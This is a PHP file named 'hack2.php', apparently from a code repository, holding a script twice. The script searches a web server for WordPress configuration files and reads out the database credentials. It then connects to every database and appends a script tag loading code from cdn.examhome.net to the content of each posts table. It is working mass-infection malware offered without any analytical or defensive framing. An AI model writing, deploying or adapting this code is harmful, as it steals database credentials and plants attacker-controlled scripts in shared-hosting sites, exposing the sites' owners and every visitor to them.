geektutor/hack2.php

## hack2.php
<?php echo ":#009009#:";
$file_to_search = "wp-config.php";

@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

function search_file($dir,$file_to_search){

$files = scandir($dir);

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false) {

			show_sitenames($path);


        }

    } else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }
 }
}

echo ":#009009#:";


function show_sitenames($file){
	$content = @file_get_contents($file);
	if(strpos($content, "DB_NAME") !== false) {


	$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
	$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
	$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
	$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {
  echo $conn->connect_error;
} else {


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
		$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
	$result2 = $conn->query($q2);
	if ($result2->num_rows > 0) {
		while($row2 = $result2->fetch_assoc()) {
			$val = $row2['post_content'];
			if(strpos($val, "examhome") === false){

				echo "nothing:".$file."\n";

				$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
				$conn->query($q3);

			} else {

				echo "already exist:".$file."\n";
			}
		}
	} else {
	}
    }
} else {
}
$conn->close();
}
}
}

function get_var_reg($pat,$text) {

	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
	{
		return $matches[1][0];
	}

	return "";
}


exit();
	<?php echo ":#009009#:";
	$file_to_search = "wp-config.php";

	@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
	@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
	@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
	@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
	@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
	@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

	function search_file($dir,$file_to_search){

	$files = scandir($dir);

	foreach($files as $key => $value){

	$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

	if(!is_dir($path)) {
	if (strpos($value,$file_to_search) !== false) {

	show_sitenames($path);



	}

	} else if($value != "." && $value != "..") {

	search_file($path, $file_to_search);

	}
	}
	}

	echo ":#009009#:";



	function show_sitenames($file){
	$content = @file_get_contents($file);
	if(strpos($content, "DB_NAME") !== false) {


	$db = get_var_reg("'DB_NAME'.?,.?['\|\"](.*?)['\|\"]",$content);
	$host = get_var_reg("'DB_HOST'.?,.?['\|\"](.*?)['\|\"]",$content);
	$user = get_var_reg("'DB_USER'.?,.?['\|\"](.*?)['\|\"]",$content);
	$pass = get_var_reg("'DB_PASSWORD'.?,.?['\|\"](.*?)['\|\"]",$content);


	// Create connection
	$conn = new mysqli($host, $user, $pass);

	// Check connection
	if ($conn->connect_error) {
	echo $conn->connect_error;
	} else {


	$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
	$result = $conn->query($q);
	if ($result->num_rows > 0) {
	while($row = $result->fetch_assoc()) {
	$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
	$result2 = $conn->query($q2);
	if ($result2->num_rows > 0) {
	while($row2 = $result2->fetch_assoc()) {
	$val = $row2['post_content'];
	if(strpos($val, "examhome") === false){

	echo "nothing:".$file."\n";

	$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
	$conn->query($q3);

	} else {

	echo "already exist:".$file."\n";
	}
	}
	} else {
	}
	}
	} else {
	}
	$conn->close();
	}
	}
	}

	function get_var_reg($pat,$text) {

	if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
	{
	return $matches[1][0];
	}

	return "";
	}


	exit();